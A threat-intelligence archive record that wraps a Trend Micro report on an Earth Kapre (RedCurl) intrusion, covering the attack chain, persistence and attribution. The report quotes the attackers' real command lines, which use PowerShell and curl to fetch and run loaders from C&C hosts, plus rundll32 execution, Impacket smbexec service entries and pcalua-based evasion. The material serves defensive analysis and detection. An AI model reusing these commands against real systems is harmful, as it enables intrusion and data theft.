{
	"id": "bd6bbe32-a89f-419e-b44e-62a99b5939e1",
	"created_at": "2026-04-06T00:08:18.644456Z",
	"updated_at": "2026-04-10T03:30:34.704338Z",
	"deleted_at": null,
	"sha1_hash": "73e3ac4f56cf229969dd6b1193a1c28c6bd36318",
	"title": "Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2895707,
	"plain_text": "Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With\r\nTrend Micro MDR, Threat Intelligence\r\nBy: Mohamed Fahmy Mar 06, 2024 Read time: 11 min (2850 words)\r\nPublished: 2024-03-06 · Archived: 2026-04-05 17:13:13 UTC\r\nAPT \u0026 Targeted Attacks\r\nThis blog entry will examine Trend Micro MDR team's investigation that successfully uncovered the intrusion sets\r\nemployed by Earth Kapre in a recent incident, as well as how the team leveraged threat intelligence to attribute the extracted\r\nevidence to the cyberespionage threat group.\r\nThe espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting\r\norganizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing\r\nemails that contain malicious attachments (.iso and .img), which lead to successful infections upon opening. This triggers the\r\ncreation of a scheduled task for persistence, alongside the unauthorized collection and transmission of sensitive data to\r\ncommand-and-control (C\u0026C) servers.\r\nThe Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted an\r\ninvestigation of an incident where numerous machines were infected by the Earth Kapre downloader. This piece of malware\r\nwas observed establishing connections with its C\u0026C servers, suggesting a potential data theft scenario. Interestingly, in this\r\ninstance, Earth Kapre has returned to using a previously known technique that is distinct from its more recent campaigns: It\r\nused legitimate tools Powershell.exe and curl.exe to procure the subsequent stage downloader. 
In an attempt to blend into\r\nthe network and evade detection, Earth Kapre was found to have used the Program Compatibility Assistant (pcalua.exe) to\r\nexecute malicious command lines.\r\nMDR investigation\r\nThe Trend Micro MDR threat hunting team initially detected the creation of a suspicious file in C:\\Windows\\System32\\ms.dll\r\n(detected by Trend Micro as Trojan.Win64.CRUDLER.A). Further investigation revealed the use of curl.exe to download\r\nthe file from the following URLs:\r\nhttp://preston[.]melaniebest[.]com/ms/ms.tmp\r\nhttps://preslive[.]cn[.]alphastoned.pro/ms/msa.tmp\r\nhttps://unipreg[.]tumsun[.]com/ms/psa.tmp\r\nhttp://report[.]hkieca[.]com/ms/msa.tmp\r\nhttps://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html\r\nPage 1 of 16\n\nFigure 1. Trend Vision One™ Execution Profile shows the downloaded Earth Kapre loader using “curl.exe”\r\nfrom “http://preston[.]melaniebest[.]com” (23[.]254[.]224[.]79).\r\nAfter examining the events around the time the file was created, we discovered that the threat actor executed the following\r\nactions:\r\nWe observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL\r\nhttp://preston[.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:\\Windows\\System32\\ directory. For the\r\nbenefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously\r\nmentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. 
While it\r\nis a legitimate tool, it can also be abused by threat actors for malicious purposes.\r\n%COMSPEC% /Q /c echo powershell -c \"iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile\r\nC:\\Windows\\System32\\curl.exe -UseBasicParsing\" ^\u003e \\\\127.0.0.1\\C$\\dvPqyh 2^\u003e^\u00261 \u003e %TEMP%\\KzIMnc.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\KzIMnc.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\KzIMnc.bat\r\nNext, 7za.tmp was downloaded and saved as 7za.exe in C:\\Windows\\System32\\ directory. 7za.exe is a copy of 7-Zip, a\r\npopular open-source file compression and archiving utility.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo curl -o C:\\Windows\\System32\\7za.exe\r\nhttp://preston[.]melaniebest[.]com/ms/7za.tmp ^\u003e \\\\127.0.0.1\\C$\\xWJhao 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\IAqJUm.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\IAqJUm.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del\r\nC:\\Windows\\TEMP\\IAqJUm.bat\r\nThe Earth Kapre loader was then downloaded using curl.exe from the same domain,\r\nhttp://preston[.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that in some machines,\r\nthe file name used was ps.dll) in the C:\\Windows\\System32\\ directory. The threat actors used echo (as also seen in previous\r\ncommands) and outputted it into a batch file, which is a commonly employed obfuscation technique. By echoing the\r\ncommand into a batch file, they could dynamically generate and execute commands, making it harder to analyze or detect\r\nmalicious activities. 
The use of temporary batch files also allows for task automation and easier security monitoring evasion.\r\nWe observed that the threat actors deleted the batch file afterward to cover their tracks.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo curl -o C:\\Windows\\System32\\ms.dll\r\nhttp://preston[.]melaniebest.com/ms/ms.tmp ^\u003e \\\\127.0.0.1\\C$\\tZpOKq 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\DFMPAa.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\DFMPAa.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del\r\nC:\\Windows\\TEMP\\DFMPAa.bat\r\nSince ms.tmp is an archive, the threat actors would need to use the previously downloaded 7za.exe (7-Zip) to extract file\r\ncontents via the password “123”.\r\nC:\\Windows\\system32\\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\\Windows\\Temp\\ms.tmp -o C:\\Windows\\Temp\\ ^\u003e\r\n\\\\127.0.0.1\\C$\\lgNMiK 2^\u003e^\u00261 \u003e C:\\Windows\\TEMP\\BuWmUA.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c\r\nC:\\Windows\\TEMP\\BuWmUA.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c del C:\\Windows\\TEMP\\BuWmUA\r\nRundll32.exe was then used to execute ms.dll on the machine (in some machines, ps.dll was executed).\r\n%COMSPEC% /Q /c echo rundll32.exe C:\\Windows\\system32\\ms.dll,ms ^\u003e \\\\127.0.0.1\\C$\\NoajCy 2^\u003e^\u00261 \u003e\r\n%TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\YdEcul.bat\r\nA Python script was also crafted to establish outbound communication and execute remote commands using Server Message\r\nBlock (SMB) via port 445. 
During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86,\r\nis passed as a command-line argument, suggesting its potential role as a C\u0026C server.\r\n\"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\MUIService\\pythonw.exe\"  C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\MUIService\\rpv\\client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808\r\nThe presence of Impacket\r\nImpacket is an open-source collection of Python classes for constructing and manipulating network protocols. Impacket\r\nactivity was detected in the organization’s network, indicating its use of Windows network protocol interactions. The\r\nobserved command lines align with Impacket's smbexec script, enabling a semi-interactive shell via SMB. Threat actors are\r\ndrawn to Impacket's versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog\r\nentry.\r\nFigure 2. Evidence of Impacket-related services in the registry\r\nFigure 3. 
An example of Impacket’s execution observed in the registry via Trend Vision One Execution\r\nProfile\r\nThe command lines we identified in our investigation closely resembled Impacket’s smbexec script, as demonstrated in the\r\nsucceeding examples:\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\aQpzRMnIku\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo rundll32.exe C:\\Windows\\system32\\ms.dll,ms ^\u003e \\\\127.0.0.1\\C$\\NoajCy\r\n2^\u003e^\u00261 \u003e %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c %TEMP%\\YdEcul.bat \u0026 %COMSPEC% /Q /c del\r\n%TEMP%\\YdEcul.bat\r\nRegistry value type: 2\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\kPbzlGKCyO\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo curl -o C:\\Windows\\System32\\ms.dll\r\nhttp://preston.melaniebest.com/ms/ms.tmp ^\u003e \\\\127.0.0.1\\C$\\tZpOKq 2^\u003e^\u00261 \u003e %TEMP%\\DFMPAa.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\DFMPAa.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\DFMPAa.bat\r\nRegistry value type: 2\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\lzZqdAEwKP\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo curl -o C:\\Windows\\System32\\7za.exe\r\nhttp://preston.melaniebest.com/ms/7za.tmp ^\u003e \\\\127.0.0.1\\C$\\xWJhao 2^\u003e^\u00261 \u003e %TEMP%\\IAqJUm.bat \u0026\r\n%COMSPEC% /Q /c %TEMP%\\IAqJUm.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\IAqJUm.bat\r\nRegistry value type: 2\r\nWe identified a command that appears to use netstat to check for an open port 4119. The purpose of this command might\r\ninvolve gathering network connection information linked to the specified port or checking for a specific pattern in the netstat\r\noutput. 
Port 4119 serves as the Trend Micro Deep Security Manager GUI and API port, suggesting that the threat actor could\r\nbe verifying the presence of the security program on this machine.\r\nRegistry root: 3\r\nRegistry key: HKLM\\SYSTEM\\CurrentControlSet\\Services\\zOMISPlXbL\r\nRegistry value name: imagepath\r\nRegistry value data: %COMSPEC% /Q /c echo netstat -an | find \"4119\" ^\u003e \\\\127.0.0.1\\C$\\SspgqD 2^\u003e^\u00261 \u003e\r\n%TEMP%\\MjHubF.bat \u0026 %COMSPEC% /Q /c %TEMP%\\MjHubF.bat \u0026 %COMSPEC% /Q /c del %TEMP%\\MjHubF.bat\r\nRegistry value type: 2\r\nFigure 4. Evidence of netstat checking if port 4119 is open\r\nAbusing the Program Compatibility Assistant Service via Indirect Command Execution\r\nThe Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address\r\ncompatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass\r\nsecurity restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool\r\nto obscure their activities.\r\nThe Earth Kapre downloader has been distributed across various locations under randomly generated or obfuscated file\r\nnames. 
The following are some enumerated examples that we discovered in our investigation:\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\AppList\\gkcb92eb2f8982d93a.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\gkcb92eb2f8982d93a.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\sgef07b190e6e6d160.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\AppList\\sgef07b190e6e6d160.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Subscription\\ujb7238088847c09ed.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\BrokerInfraSVR\\fik9562b2dec16c7ad6.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\BrokerInfra\\izd9562b2dec16c7ad6.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Sysmain\\zyp14f2b5c5ecbb07d8.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\tw-pfdc-320c6-4e95qd.tmp\\pj8434bb720ad953af.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\tw-pfdc-320c6-4e95qd.tmp\\kmjf1a1952febed5f77.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\DirectoryClient\\yff936ad712ca94fc9.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\D3DSCache\\85ceb3adf3f4542\\lva662fdf404f617d07.exe\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PRICache\\2630989932\\ogh0a430e919a35efd\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Plex\\ComponentODN\\ylob1c94b2421ca1d39.exe\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\VirtualStore\\ChromeSY_Q05MQVAyMw==.exe\r\nIn the following screenshot example, the file gkcb92eb2f8982d93a.exe, which was spawned by pcalua.exe, is observed\r\nestablishing a connection to 
preston[.]melaniebest[.]com, the same domain discussed in the previous section.\r\nFigure 5. Earth Kapre downloader connects to “preston[.]melaniebest[.]com”\r\nTo confirm the availability of a network connection, the Earth Kapre downloader sends an HTTP GET request directed at a\r\nrandomly selected network resource from the following list:\r\nwww.amazon.com\r\nwww.bing.com\r\nduckduckgo.com\r\nwww.ebay.com\r\nwww.google.com\r\nwww.google.co.uk\r\nwww.microsoft.com\r\nwww.msn.com\r\nocsp.digicert.com\r\nocsp.pki.goog\r\nocsp.usertrust.com\r\nopenid.ladatap.com\r\nwww.reddit.com\r\nunipreg.tumsun.com\r\nwww.wikipedia.org\r\nx1.c.lencr.org\r\nwww.yahoo.com\r\nBy analyzing the acquired Earth Kapre downloader sample file, we have confirmed that the InternetOpenA and\r\nInternetConnectA API functions were used. These functions facilitate HTTP requests and verify the presence of a network\r\nconnection.\r\nFigure 6. The Earth Kapre downloader confirms the network connection by sending an HTTP request to\r\nwww.yahoo.com.\r\nUse of scheduled tasks for persistence\r\nScheduled tasks were installed for persistence, as illustrated in Figure 7, where various tasks commenced before the Earth\r\nKapre downloader file was executed. Figure 7 further reveals the execution of the suspicious task CacheTask\r\nef07b190e6e6d160 just before the Earth Kapre downloader was executed.\r\nprocessCmd: C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Wininet\\CacheTask ef07b190e6e6d160\" \"pcalua.exe\" -a\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Wininet\\sgef07b190e6e6d160.exe\r\nFigure 7. Suspicious execution of scheduled tasks\r\nThe task names, file names, and file locations differ in each machine. 
Figure 8 displays evidence of malicious scheduled\r\ntasks that execute: C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Sysmain\\oxdece5f42fddfbde1.exe on an hourly basis.\r\nFigure 8. Evidence of persistence in scheduled tasks collected from “C:\\Windows\\System32\\Tasks”\r\nThe created task name varies per machine, but it incorporates a segment of the associated Earth Kapre downloader file\r\nname. For instance, if the file name is ef07b190e6e6d160.exe, the scheduled task will be named CacheTask\r\nef07b190e6e6d160. Table 1 displays examples of task names created across the infected machines in the network.\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Wininet\\CacheTask ef07b190e6e6d160\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WDI\\ResolutionHost 8434bb720ad953af\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WDI\\ResolutionHost f1a1952febed5f77\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WindowsColorSystem\\Calibration-Loader 3db1281b443ad4a0\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WlanSvc\\CDSSync b1c94b2421ca1d39\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WOF\\WIM-Hash-Management 0a430e919a35efd8\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\WwanSvc\\NotificationTask 662fdf404f617d07\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\BrokerInfrastructure\\BgTaskRegistrationMaintenanceTask 9eeb010c178ac301\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask deacb04715b35f40\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag 8ba2c22cafd02f59\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\DeviceDirectoryClient\\HandleWnsCommand f936ad712ca94fc9\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\AppListBackup\\BackupNonMaintenance cb92eb2f8982d93a\"\r\nschtasks /run /tn \"\\Microsoft\\Windows\\Subscription\\LicenseAcquisition b7238088847c09ed\"\r\nschtasks /run 
/tn \"\\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync 14f2b5c5ecbb07d8\"\r\nTable 1. Task names created in infected machines\r\nTracing the point of entry\r\nGiven that the identified patient-zero machines lacked Trend Micro XDR installation, we had limited visibility when tracing\r\nthe point of entry for the attack. To address this gap, we attempted to complete the chain by identifying a similar\r\ninfrastructure observed in the incident. Utilizing the IP address 23[.]254[.]224[.]79 from our investigation, we\r\nsystematically pivoted across various data points through cyberthreat intelligence and deduced that the initial access was\r\ndelivered via a phishing email carrying a malicious attachment. The Earth Kapre samples found in the wild, including the\r\none used in this attack, share the same infrastructure and are often delivered through malicious ISO or IMG files received\r\nvia email.\r\nThe employment of cyberthreat intelligence methodologies, which encompassed data enrichment and correlation techniques,\r\nenhanced our capability to pinpoint the entry point, as illustrated in the following graph.\r\nFigure 9. Virus Total graph showing potential point of entry\r\nFigure 10. 
Earth Kapre attack chain\r\nAttribution analysis\r\nMultiple data points and indicators strongly indicate Earth Kapre's involvement in this attack, underscoring the ongoing\r\nactivity of this group, which we will explain in detail in this section.\r\n-       The C\u0026C infrastructure\r\nAll observed C\u0026C servers pivoted to 23[.]254[.]224[.]79, which is an IP address that’s been extensively used as a C\u0026C\r\nserver by Earth Kapre, based on samples found from the latter part of 2023 to the present.\r\nFigure 11. Enriching the data by pivoting and correlating the data points of “23[.]254[.]224[.]79”\r\nThe IP address 198[.]252[.]101[.]86, which was provided as an argument to the Client.py script, is linked to one of the\r\nphishing emails sent by the Earth Kapre group. This phishing email contains an attachment that leads to the download of a\r\nmalicious LNK file and the Earth Kapre downloader.\r\nFigure 12. Enriching the data by pivoting and correlating the data points of “198[.]252[.]101[.]86”\r\nThe connection between the IP address and the phishing email can be determined from the mail header, as the IP address\r\nappears as the first hop in the mail route from the threat actor to the victim.\r\nFigure 13. The connection between the 198[.]252[.]101[.]86 IP address and the phishing email\r\n-       Code and behavior similarities\r\nThe sample we examined exhibited code similarities with known Earth Kapre downloaders used in previous campaigns.\r\nWhile the sample from the incident we handled appeared somewhat different at first glance, a closer analysis revealed\r\nstriking similarities in functionality.\r\nFor example, the string decryption function in the new sample we examined gets addresses for Bcrypt APIs and calls them\r\nin the runtime as opposed to importing them, which is what older and available samples did. 
However, the sample we\r\nexamined decrypts strings in a way that’s reminiscent of the decryption technique used by older samples:\r\n1. Calculate SHA256 for hard-coded string (yxNLWpc0s4JUTR8O3GOJC).\r\n2. Use part of the hash as an encryption key for Advanced Encryption Standard (AES) decryption.\r\nFigure 14. The examined sample shows part of an old decryption technique and the calling of Bcrypt APIs.\r\nFigure 15. Getting API addresses in runtime\r\nFigure 16. Loads and initializes SHA256 algorithm\r\nFigure 17. Loads and initializes AES algorithm\r\nFigure 18. Uses BcryptDecrypt API to decrypt string\r\nThe simple comparison between the older and newer Earth Kapre downloader samples shows that there is a 70% to 90%\r\nsimilarity between the samples. We also noted a similarity in how the samples behaved, such as in the manner they check for\r\ninternet availability and communicate with their C\u0026C server.\r\nFigure 20. Checking for internet availability\r\nUsing the Diamond Model of Intrusion Analysis\r\nThe Diamond Model of Intrusion Analysis is a cybersecurity framework that’s crucial for intrusion analysis. It decodes\r\ncyberthreats by focusing on four key aspects: adversary, infrastructure, capability, and victim. Understanding the who, why,\r\nand how of cyberattacks helps cybersecurity professionals predict and prepare for threats. 
It explores the geographical\r\norigin, identity, sponsorship, motivation, and timeline of adversaries.\r\nAdversary: Threat Actor/Attacker\r\nCapabilities: Adversary’s tools and/or techniques\r\nInfrastructure: Physical and/or logical resources used by the adversary\r\nVictim: Organization or system hit by the adversary\r\nBy analyzing these four components together, the Diamond Model of Intrusion Analysis helps cybersecurity professionals\r\nand analysts gain a comprehensive understanding of a cyberthreat and aids in attributing the threat to a specific adversary or\r\ngroup. It provides a structured approach to organizing and analyzing available data, enhancing the ability of security teams\r\nto make informed decisions about cybersecurity strategies and responses.\r\nFigure 21. Earth Kapre tactics, techniques, and procedures (TTPs), victims, and infrastructure via the\r\nDiamond Model of Intrusion Analysis Framework\r\nIn the Diamond Model, we apply the \"Rule of Two\" guide, seeking consistent combinations across various intrusion sets. If\r\na particular combination exhibits two vertices in the Diamond Model, there is a better likelihood that we are confronting the\r\nsame threat actor.\r\nIn our analysis of this case, within the capability vertices of the Diamond Model, we compared the Earth Kapre sample from\r\nthe wild with the Earth Kapre sample acquired from the customer's environment. While the new samples showed an updated\r\nstructure, both samples connect to the same infrastructure. This consistency in capability and infrastructure strongly suggests\r\nan association with the Earth Kapre group.\r\nConclusion\r\nThis case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of\r\nindustries across multiple countries. 
The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program\r\nCompatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within\r\ntargeted networks.\r\nThe detection of Impacket activity within the organization's network reveals a concerning trend in the abuse of this tool for\r\nWindows network protocol interactions. Threat actors are capitalizing on Impacket's versatility and exploiting its\r\nfunctionalities for unauthorized command execution.\r\nThis report emphasizes the significance of threat intelligence in bridging gaps within investigations, filling missing pieces of\r\nevidence that are crucial for comprehensive understanding and protection. Understanding the threat actor behind an attack is\r\nparamount for organizations seeking to bolster their defenses. This knowledge not only aids in identifying potential motives\r\nbut also allows for the implementation of tailored security measures to help prevent specific threats.\r\nThe role of MDR in uncovering intrusion sets, as demonstrated in this recent incident investigation, exemplifies its critical\r\ncontribution to cybersecurity. MDR played a key role in attributing the evidence extracted from the attack to the Earth Kapre\r\nthreat group. This reinforces the essential role of advanced threat detection and response solutions in effectively countering\r\nsophisticated threat actors.\r\nOrganizations should also consider using a multilayered approach to guard possible entry points into the system (endpoint,\r\nemail, web, and network). 
The following Trend Micro solutions can detect malicious components and suspicious behavior to\r\nhelp keep enterprises secure:\r\nTrend Vision One™ provides multilayered protection and behavior detection, which helps block questionable\r\nbehavior and tools early on before ransomware can do irreversible damage to the system.\r\nTrend Cloud One™ – Workload Security protects systems against both known and unknown threats that\r\nexploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine\r\nlearning.\r\nTrend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails, including phishing emails that can serve as entry points for\r\nransomware.\r\nTrend Micro Apex One™ offers next-level automated threat detection and response against advanced\r\nconcerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html"
	],
	"report_names": [
		"unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html"
	],
	"threat_actors": [
		{
			"id": "6ec2cd63-307d-4281-86da-5dc199e932af",
			"created_at": "2025-08-07T02:03:24.821494Z",
			"updated_at": "2026-04-10T02:00:03.843522Z",
			"deleted_at": null,
			"main_name": "GOLD BLADE",
			"aliases": [
				"Earth Kapre ",
				"Red Wolf ",
				"RedCurl "
			],
			"source_name": "Secureworks:GOLD BLADE",
			"tools": [
				"RedLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f72f2981-0dc4-4d96-857c-a725a143a538",
			"created_at": "2024-03-21T02:00:04.724563Z",
			"updated_at": "2026-04-10T02:00:03.602417Z",
			"deleted_at": null,
			"main_name": "Earth Kapre",
			"aliases": [
				"RedCurl",
				"Red Wolf",
				"GOLD BLADE"
			],
			"source_name": "MISPGALAXY:Earth Kapre",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "79e95381-8008-48dc-b981-fd66e1c46ca6",
			"created_at": "2022-10-25T16:07:24.110478Z",
			"updated_at": "2026-04-10T02:00:04.869039Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"Earth Kapre",
				"Red Wolf"
			],
			"source_name": "ETDA:RedCurl",
			"tools": [
				"Impacket",
				"LaZagne"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8108d548-e30f-4b90-aa60-71323ba66678",
			"created_at": "2024-11-01T02:00:52.667098Z",
			"updated_at": "2026-04-10T02:00:05.343786Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"RedCurl"
			],
			"source_name": "MITRE:RedCurl",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434098,
	"ts_updated_at": 1775791834,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.pdf",
		"text": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.txt",
		"img": "https://archive.orkl.eu/73e3ac4f56cf229969dd6b1193a1c28c6bd36318.jpg"
	}
}